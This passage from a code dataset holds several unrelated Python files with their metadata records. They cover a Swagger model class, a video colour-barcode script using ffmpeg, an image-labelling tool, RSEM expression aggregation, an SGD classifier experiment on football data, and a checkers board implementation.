swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'date_created': 'datetime',\n 'date_modified': 'datetime',\n 'comments': 'list[CommentDto]',\n 'status': 'StatusDto',\n 'deleted': 'bool'\n }\n\n attribute_map = {\n 'id': 'id',\n 'date_created': 'dateCreated',\n 'date_modified': 'dateModified',\n 'comments': 'comments',\n 'status': 'status',\n 'deleted': 'deleted'\n }\n\n discriminator_value_class_map = {\n 'SEGMENT_TARGET': 'SEGMENTTARGET',\n 'LQA': 'LQA'\n }\n\n def __init__(self, id=None, date_created=None, date_modified=None, comments=None, status=None, deleted=None): # noqa: E501\n \"\"\"CommonConversationDto - a model defined in Swagger\"\"\" # noqa: E501\n\n self._id = None\n self._date_created = None\n self._date_modified = None\n self._comments = None\n self._status = None\n self._deleted = None\n self.discriminator = 'type'\n\n if id is not None:\n self.id = id\n if date_created is not None:\n self.date_created = date_created\n if date_modified is not None:\n self.date_modified = date_modified\n if comments is not None:\n self.comments = comments\n if status is not None:\n self.status = status\n if deleted is not None:\n self.deleted = deleted\n\n @property\n def id(self):\n \"\"\"Gets the id of this CommonConversationDto. # noqa: E501\n\n\n :return: The id of this CommonConversationDto. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this CommonConversationDto.\n\n\n :param id: The id of this CommonConversationDto. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def date_created(self):\n \"\"\"Gets the date_created of this CommonConversationDto. # noqa: E501\n\n\n :return: The date_created of this CommonConversationDto. 
# noqa: E501\n :rtype: datetime\n \"\"\"\n return self._date_created\n\n @date_created.setter\n def date_created(self, date_created):\n \"\"\"Sets the date_created of this CommonConversationDto.\n\n\n :param date_created: The date_created of this CommonConversationDto. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._date_created = date_created\n\n @property\n def date_modified(self):\n \"\"\"Gets the date_modified of this CommonConversationDto. # noqa: E501\n\n\n :return: The date_modified of this CommonConversationDto. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._date_modified\n\n @date_modified.setter\n def date_modified(self, date_modified):\n \"\"\"Sets the date_modified of this CommonConversationDto.\n\n\n :param date_modified: The date_modified of this CommonConversationDto. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._date_modified = date_modified\n\n @property\n def comments(self):\n \"\"\"Gets the comments of this CommonConversationDto. # noqa: E501\n\n\n :return: The comments of this CommonConversationDto. # noqa: E501\n :rtype: list[CommentDto]\n \"\"\"\n return self._comments\n\n @comments.setter\n def comments(self, comments):\n \"\"\"Sets the comments of this CommonConversationDto.\n\n\n :param comments: The comments of this CommonConversationDto. # noqa: E501\n :type: list[CommentDto]\n \"\"\"\n\n self._comments = comments\n\n @property\n def status(self):\n \"\"\"Gets the status of this CommonConversationDto. # noqa: E501\n\n\n :return: The status of this CommonConversationDto. # noqa: E501\n :rtype: StatusDto\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this CommonConversationDto.\n\n\n :param status: The status of this CommonConversationDto. # noqa: E501\n :type: StatusDto\n \"\"\"\n\n self._status = status\n\n @property\n def deleted(self):\n \"\"\"Gets the deleted of this CommonConversationDto. # noqa: E501\n\n\n :return: The deleted of this CommonConversationDto. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._deleted\n\n @deleted.setter\n def deleted(self, deleted):\n \"\"\"Sets the deleted of this CommonConversationDto.\n\n\n :param deleted: The deleted of this CommonConversationDto. 
# noqa: E501\n :type: bool\n \"\"\"\n\n self._deleted = deleted\n\n def get_real_child_model(self, data):\n \"\"\"Returns the real base class specified by the discriminator\"\"\"\n discriminator_value = data[self.discriminator].lower()\n return self.discriminator_value_class_map.get(discriminator_value)\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(CommonConversationDto, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CommonConversationDto):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n", "sub_path": "memsource_cli/models/common_conversation_dto.py", "file_name": "common_conversation_dto.py", "file_ext": "py", "file_size_in_byte": 7550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "six.iteritems", "line_number": 218, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 243, "usage_type": "call"}]} +{"seq_id": "576884342", "text": "import re\nimport subprocess as sp\nimport sys\nimport time\n\nimport numpy as np\nfrom PIL import Image, ImageDraw\n\n# Timestamp so you can see how long it took\nstart_time = \"Script started at \" + time.strftime(\"%H:%M:%S\")\nprint(start_time)\n\n# input file (first argument)\nfilename = str(sys.argv[1])\noutfilename = re.sub(r\"\\W+\", \"\", filename) + \".png\"\n\n## Get the metadata for the file\n\nFFPROBE_BIN = r\"C:\\Users\\Nick\\Documents\\Programming\\ffmpeg\\bin\\ffprobe.exe\"\ncommand = [\n FFPROBE_BIN,\n \"-loglevel\",\n \"quiet\",\n \"-select_streams\",\n \"v:0\",\n \"-show_entries\",\n \"stream=width,height\",\n \"-show_format\",\n \"-of\",\n \"default=nk=1:nw=1\",\n \"1917.mkv\",\n]\n\noutput = sp.check_output(command).decode(\"utf-8\")\nmetadata = output.split(\"\\n\")\n\n# orig_width, orig_height = metadata[0], metadata[1]\nruntime = int(float(metadata[8]))\ntotal_frames = runtime * 24\nevery_n_frames = total_frames // 4096\n\n\nprint(\"Filename:\", filename)\nprint(\"Duration (s): \", runtime)\nprint(f\"Taking every {every_n_frames} frames\")\n\n###\n### This section: credit to http://zulko.github.io/blog/2013/09/27/read-and-write-video-frames-in-python-using-ffmpeg/\n\n# Open the video file. 
In Windows you might need to use FFMPEG_BIN=\"ffmpeg.exe\"; Linux/OSX should be OK.\nFFMPEG_BIN = r\"C:\\Users\\Nick\\Documents\\Programming\\ffmpeg\\bin\\ffmpeg.exe\"\ncommand = [\n FFMPEG_BIN,\n \"-threads\",\n \"16\",\n \"-i\",\n filename,\n \"-f\",\n \"image2pipe\",\n \"-pix_fmt\",\n \"rgb24\",\n \"-s\",\n \"320x200\", # downscale before processing for faster runtime\n \"-vcodec\",\n \"rawvideo\",\n \"-\",\n]\npipe = sp.Popen(command, stdout=sp.PIPE, bufsize=10 ** 8)\n\n# get the average rgb value of a frame\ndef draw_next_frame_rgb_avg(raw_frame):\n frame = np.fromstring(raw_frame, dtype=\"uint8\")\n frame = frame.reshape((320, 200, 3))\n rgb_avg = (\n int(np.average(frame[:, :, 0])),\n int(np.average(frame[:, :, 1])),\n int(np.average(frame[:, :, 2])),\n )\n return rgb_avg\n\n\n# Go through the pipe one frame at a time until it's empty; store each frame's RGB values in rgb_list\nrgb_list = []\nx = 1 # optional; purely for displaying how many frames were processed\nwhile True: # as long as there's data in the pipe, keep reading frames\n try:\n next_frame = pipe.stdout.read(320 * 200 * 3)\n except:\n print(\n \"No more frames to process (or error occurred). Number of frames processed:\",\n x,\n )\n break\n\n if len(next_frame) < (320 * 200 * 3):\n break\n\n x = x + 1\n if x % every_n_frames == 0:\n rgb_list.append(draw_next_frame_rgb_avg(next_frame))\n\n\n# create a new image width the same width as number of frames sampled,\n# and draw one vertical line per frame at x=frame number\nimage_height = 2160 # set image height to whatever you want; you could use int(len(rgb_list)*9/16) to make a 16:9 image for instance\nnew = Image.new(\"RGB\", (len(rgb_list), image_height))\ndraw = ImageDraw.Draw(new)\n# x = the location on the x axis of the next line to draw\nx_pixel = 1\nfor rgb_tuple in rgb_list:\n draw.line((x_pixel, 0, x_pixel, image_height), fill=rgb_tuple)\n x_pixel = x_pixel + 1\nnew.show()\nnew.save(outfilename, \"PNG\")\n\nprint(\"Script finished at \" + time.strftime(\"%H:%M:%S\"))\nprint(\"Frames\" + str(len(rgb_list)))\n", "sub_path": "process_video.py", "file_name": "process_video.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.strftime", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 34, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.fromstring", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 106, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 107, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "186610263", "text": "\"\"\"Sort the files based on user input.\"\"\"\n\nimport cv2\nimport os\nimport glob\nimport argparse\nimport shutil\n\nap = 
argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--folder\", required=True, help=\"Folder to sort\")\nap.add_argument(\"-s\", \"--start\",\n nargs='?',\n const=1,\n help=\"Start image #\",\n type=int)\nargs = vars(ap.parse_args())\npath = args[\"folder\"]\nstart = args[\"start\"]\n\nif path[-1] != \"/\":\n path += \"/\"\nif not os.path.exists(path):\n print(\"Invalid path: {}\".format(path))\n exit()\nif not os.path.exists(path + \"True\"):\n os.makedirs(path + \"True\")\nif not os.path.exists(path + \"False\"):\n os.makedirs(path + \"False\")\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nif start is None:\n start = 1\ni = start\nfilenames = glob.glob(path+\"*.png\")\nfile_labels = []\nfor filename in filenames:\n file_labels.append(0)\n\nwhile True:\n print(\"Current image number is: \"+str(i))\n img = cv2.imread(filenames[i], -1)\n if file_labels[i] == 1:\n cv2.putText(img, (\"Labeled as 'True'\"),\n (20, 40), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n if file_labels[i] == -1:\n cv2.putText(img, (\"Labeled as 'False'\"),\n (10, 40), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow((\"Is it clear? Right Shift = True,\"\n \"? = False, Enter = Finalize, \"\n \"- = Go back, + = Go forward\"),\n img[::2, ::2, ::])\n k = cv2.waitKey(0) & 0xFF\n if k == 45 and i > 0:\n i -= 1\n if k == 61 and i < (len(filenames) - 1):\n i += 1\n if k == 226:\n file_labels[i] = 1\n if i < (len(filenames) - 1):\n i += 1\n if k == 47:\n file_labels[i] = -1\n if i < (len(filenames) - 1):\n i += 1\n print(k)\n if k == 27:\n exit()\n if k == 13:\n break\nfor index, filename in enumerate(filenames):\n TruePath = filename.replace(path, path+\"True/\")\n FalsePath = filename.replace(path, path+\"False/\")\n if file_labels[index] > 0:\n print(\"Copying {} to {}\".format(filename, TruePath))\n shutil.copyfile(filename, TruePath)\n if file_labels[index] < 0:\n print(\"Copying {} to {}\".format(filename, FalsePath))\n shutil.copyfile(filename, FalsePath)\n", "sub_path": "man_sort.py", "file_name": "man_sort.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 30, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 75, "usage_type": "call"}, 
{"api_name": "shutil.copyfile", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "566164035", "text": "import sys,argparse\nimport os,glob,re\nimport numpy as np\nimport pandas as pd\n\n\ndef main(indir,outdir):\n\n os.makedirs(outdir,exist_ok=True)\n mapping_dirs = glob.glob(indir+'/*')\n out_count = pd.DataFrame()\n out_tpm = pd.DataFrame()\n out_fpkm = pd.DataFrame()\n \n for mapping_dir in sorted(mapping_dirs):\n sample_id = os.path.basename(mapping_dir)\n print(mapping_dir,sample_id)\n # ==== mapping rate\n expr_file = mapping_dir+os.sep+'/{}_rsem.genes.results'.format(sample_id)\n with open(expr_file) as expr_f:\n expr_df = pd.read_csv(expr_f,sep='\\t',index_col=0)\n out_count = pd.concat([out_count,expr_df['expected_count'].rename(sample_id)],axis=1)\n out_tpm = pd.concat([out_tpm,expr_df['TPM'].rename(sample_id)],axis=1)\n out_fpkm = pd.concat([out_fpkm,expr_df['FPKM'].rename(sample_id)],axis=1)\n\n out_count.to_csv(outdir+os.sep+'expected_count.csv')\n out_tpm.to_csv(outdir+os.sep+'tpm.csv')\n out_fpkm.to_csv(outdir+os.sep+'fpkm.csv')\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n #parser.add_argument('-i', '--infile', action = 'store', type = str,dest = 'infile', help = 'input file of', metavar = '')\n# parser.add_argument('-o','--outfile', action = 'store', type = str,dest = 'outfile', help = 'outfile of', metavar = '')\n parser.add_argument('-i', '--indir', action = 'store', type = str,dest = 'indir', help = 'input dir of salmon results', metavar = '')\n parser.add_argument('-o','--outdir', action = 'store', type = str,dest = 'outdir', help = 'outdir of ,default: current dir', metavar = '',default='./')\n #parser.add_argument('-s','--species', action = 'store', type = str,dest = 'species', help = 'species used to choose correct chromosome, e.g., hg38 or mm10', metavar = '',required=True)\n \n\n args = parser.parse_args()\n if(len(sys.argv))<5:\n parser.print_help()\n sys.exit(1)\n \n main(args.indir,args.outdir)\n", "sub_path": "f0_data_process/rna_seq/data_1st_submit_old_not_used/3_expr_collection.py", "file_name": "3_expr_collection.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 24, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, 
"usage_type": "call"}]} +{"seq_id": "252199091", "text": "from sklearn.linear_model import SGDClassifier\r\nfrom sklearn.model_selection import KFold\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport Positions_Traits as posT\r\nimport helperFunctions as hf\r\n\r\nif __name__ == '__main__':\r\n files = [\"CAMS\", \"CBs\", \"CMs\", \"CDMs\", \"GKs\", \"LBs\", \"LMs\", \"RBs\", \"RMs\",\r\n \"Strikers\"]\r\n for file in files:\r\n dataset = pd.read_csv(\"Success_\" + file + \".csv\")\r\n attrbs = []\r\n attrbs_names = []\r\n attrbs = attrbs + hf.roleTraitIndexesFinder([\"Age\"], dataset.columns, hf.year_2012)\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(posT.General_Info, dataset.columns, \"\")\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(posT.Positive_Traits, dataset.columns, hf.year_2012)\r\n for role in posT.positionToTraits[file]:\r\n attrbs = attrbs + hf.roleTraitIndexesFinder(role, dataset.columns, hf.year_2012)\r\n attrbs = list(set(attrbs))\r\n attrbs_names = list(set(attrbs_names))\r\n X = dataset.iloc[:, attrbs].values.astype(float)\r\n y = dataset.iloc[:, -1].values\r\n X = hf.normalizeAge(hf.normalizeMarketValue(hf.normalizeCA(X, 1), -1, file), 0)\r\n kf = KFold(n_splits=5)\r\n splits = []\r\n # X = SelectKBest(f_classif, k=20).fit_transform(X, y)\r\n for train, test in kf.split(X):\r\n splits.append((train, test))\r\n last_results = {\r\n None: [],\r\n 'l2': [],\r\n 'l1': [],\r\n 'elasticnet': []\r\n }\r\n for penalty in [None, 'l2', 'l1', 'elasticnet']:\r\n results = [0] * 7\r\n index = 0\r\n for eta0 in [0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1]:\r\n for train_index, test_index in splits:\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n clf = SGDClassifier(loss=\"squared_hinge\", penalty=penalty, eta0=eta0,\r\n alpha=0.1) # two runs, change loss(squared_hinge and perceprton) and compare\r\n clf.fit(X_train, y_train)\r\n pred_i = clf.predict(X_test)\r\n results[index] += ((1 - np.mean(pred_i != y_test)) / splits.__len__())\r\n index += 1\r\n last_results[penalty] = results\r\n plt.figure(figsize=(12, 6))\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results[None], color='red', marker='o',\r\n markerfacecolor='red', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['l2'], color='blue', marker='o',\r\n markerfacecolor='blue', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['l1'], color='black', marker='o',\r\n markerfacecolor='black', markersize=10)\r\n plt.plot([0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], last_results['elasticnet'], color='brown', marker='o',\r\n markerfacecolor='brown', markersize=10)\r\n plt.title('Accuracy Rate StochasticGradientDescent ' + file)\r\n plt.xlabel('Eta0')\r\n plt.ylabel('Mean Accuracy')\r\n plt.legend([str(i) for i in last_results.keys()])\r\n plt.savefig(\"Results/StochasticGradientDescent/Hinge_Graph_\" + file + \".png\")\r\n plt.show()\r\n\r\n fig, ax = plt.subplots()\r\n\r\n # hide axes\r\n fig.patch.set_visible(False)\r\n ax.axis('off')\r\n ax.axis('tight')\r\n for key in last_results.keys():\r\n for idx in range(len(last_results[key])):\r\n last_results[key][idx] = float(\"{:.4f}\".format(last_results[key][idx]))\r\n df = pd.DataFrame(last_results, columns=last_results.keys())\r\n header = ax.table(cellText=[['']],\r\n colLabels=['penalty'],\r\n loc='bottom', bbox=[0, -0.025, 1.0, 0.15]\r\n )\r\n table = ax.table(cellText=df.values, rowLabels=[0.01, 0.1, 0.3, 0.5, 0.6, 0.8, 1], 
colLabels=df.columns,\r\n colWidths=[0.3, 0.3, 0.3, 0.3, 0.3], loc='bottom', cellLoc='center',\r\n rowColours=['r', 'r', 'r', 'r', 'r', 'r', 'r'],\r\n colColours=['r', 'r', 'r', 'r'], bbox=[0, -0.35, 1.0, 0.4])\r\n table.auto_set_font_size(False)\r\n table.scale(1, 1.3)\r\n table.set_fontsize(7)\r\n table.add_cell(0, -1, width=0.4, height=0.090, text=\"eta0\")\r\n plt.figure(figsize=(20, 10))\r\n table._cells[(0, 0)]._text.set_text(\"None\")\r\n fig.tight_layout()\r\n fig.savefig(\"Results/StochasticGradientDescent/Hinge_\" + file + \".png\")\r\n plt.show()\r\n", "sub_path": "AlgoLatestPrints/StochasticGradientDescent.py", "file_name": "StochasticGradientDescent.py", "file_ext": "py", "file_size_in_byte": 4705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 16, "usage_type": "call"}, {"api_name": "helperFunctions.year_2012", "line_number": 16, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 17, "usage_type": "call"}, {"api_name": "Positions_Traits.General_Info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 18, "usage_type": "call"}, {"api_name": "Positions_Traits.Positive_Traits", "line_number": 18, "usage_type": "attribute"}, {"api_name": "helperFunctions.year_2012", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Positions_Traits.positionToTraits", "line_number": 19, "usage_type": "attribute"}, {"api_name": "helperFunctions.roleTraitIndexesFinder", "line_number": 20, "usage_type": "call"}, {"api_name": "helperFunctions.year_2012", "line_number": 20, "usage_type": "attribute"}, {"api_name": "helperFunctions.normalizeAge", "line_number": 25, "usage_type": "call"}, {"api_name": "helperFunctions.normalizeMarketValue", "line_number": 25, "usage_type": "call"}, {"api_name": "helperFunctions.normalizeCA", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 62, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "273038155", "text": "\"\"\"\nMartin Kersner, m.kersner@gmail.com\nseoulai.com\n2018\n\"\"\"\nfrom typing import Tuple\nfrom typing import Dict\nfrom typing import List\n\nfrom seoulai_gym.envs.checkers.base import Constants\nfrom seoulai_gym.envs.checkers.base import DarkPiece\nfrom seoulai_gym.envs.checkers.base import LightPiece\nfrom seoulai_gym.envs.checkers.rules import Rules\n\n\nclass Board(Constants, Rules):\n def __init__(\n self,\n size: int=8,\n ):\n \"\"\"Board constructor.\n\n Args:\n size: Board size.\n \"\"\"\n self.size = size\n self.init()\n\n def init(\n self,\n ) -> None:\n \"\"\"Initialize board and setup pieces on board.\n\n Note: Dark pieces should be ALWAYS on the top of the board.\n \"\"\"\n self.board_list = [\n sum([[DarkPiece(), None] for _ in range(self.size//2)], []),\n sum([[None, DarkPiece()] for _ in range(self.size//2)], []),\n sum([[DarkPiece(), None] for _ in range(self.size//2)], []),\n sum([[None] for _ in range(self.size)], []),\n sum([[None] for _ in range(self.size)], []),\n sum([[None, LightPiece()] for _ in range(self.size//2)], []),\n sum([[LightPiece(), None] for _ in range(self.size//2)], []),\n sum([[None, LightPiece()] for _ in range(self.size//2)], []),\n ]\n\n def move(\n self,\n ptype: int,\n from_row: int,\n from_col: int,\n to_row: int,\n to_col: int,\n ) -> Tuple[List[List], int, bool, Dict]:\n \"\"\"Move piece across board and check validity of movement.\n\n Args:\n ptype: Type of piece making a move.\n from_row: Row of board of original piece location.\n from_col: Column of board of original piece location.\n to_row: Row of board of desired piece location.\n to_col: Column of board of desired piece location.\n\n Returns:\n obs: information about positions of pieces.\n rew: reward for perfomed step.\n done: information about end of game.\n info: additional information about current step.\n\n Raises:\n ValueError: If given movement is not valid.\n \"\"\"\n rew = 0 # TODO compute reward\n info = {}\n\n if not self.validate_move(self.board_list, from_row, from_col, to_row, to_col):\n raise ValueError(f\"Attempt to move to invalid position.\")\n else:\n info.update({\"moved\": ((from_row, from_col), (to_row, to_col))})\n\n # don't move with opponent's piece\n if ptype != self.board_list[from_row][from_col].ptype:\n raise ValueError(\"Attempt to move with opponent's piece.\")\n\n # move\n self.board_list[to_row][to_col] = 
self.board_list[from_row][from_col]\n self.board_list[from_row][from_col] = None\n\n # remove opponent's piece\n between_row, between_col = self.get_between_position(from_row, from_col, to_row, to_col)\n if between_row is not None and between_col is not None:\n p_between = self.board_list[between_row][between_col]\n if p_between is not None:\n self.board_list[between_row][between_col] = None\n info.update({\"removed\": ((between_row, between_col), p_between)})\n\n # become king\n p = self.board_list[to_row][to_col]\n if (to_row == 0 and p.direction == self.UP) or (to_row == self.size-1 and p.direction == self.DOWN):\n p.make_king()\n info.update({\"king\": (to_row, to_col)})\n\n # end of game?\n if len(self.get_positions(self.board_list, self.get_opponent_type(p.ptype), self.size)) == 0:\n # opponent lost all his pieces\n done = True\n elif len(self.generate_valid_moves(self.board_list, self.get_opponent_type(p.ptype), self.size)) == 0:\n # opponent cannot make any move\n done = True\n else:\n done = False\n\n obs = self.board_list\n return obs, rew, done, info\n", "sub_path": "seoulai_gym/envs/checkers/board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 4028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seoulai_gym.envs.checkers.base.Constants", "line_number": 16, "usage_type": "name"}, {"api_name": "seoulai_gym.envs.checkers.rules.Rules", "line_number": 16, "usage_type": "name"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 37, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 38, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.DarkPiece", "line_number": 39, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 42, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 43, "usage_type": "call"}, {"api_name": "seoulai_gym.envs.checkers.base.LightPiece", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.List", 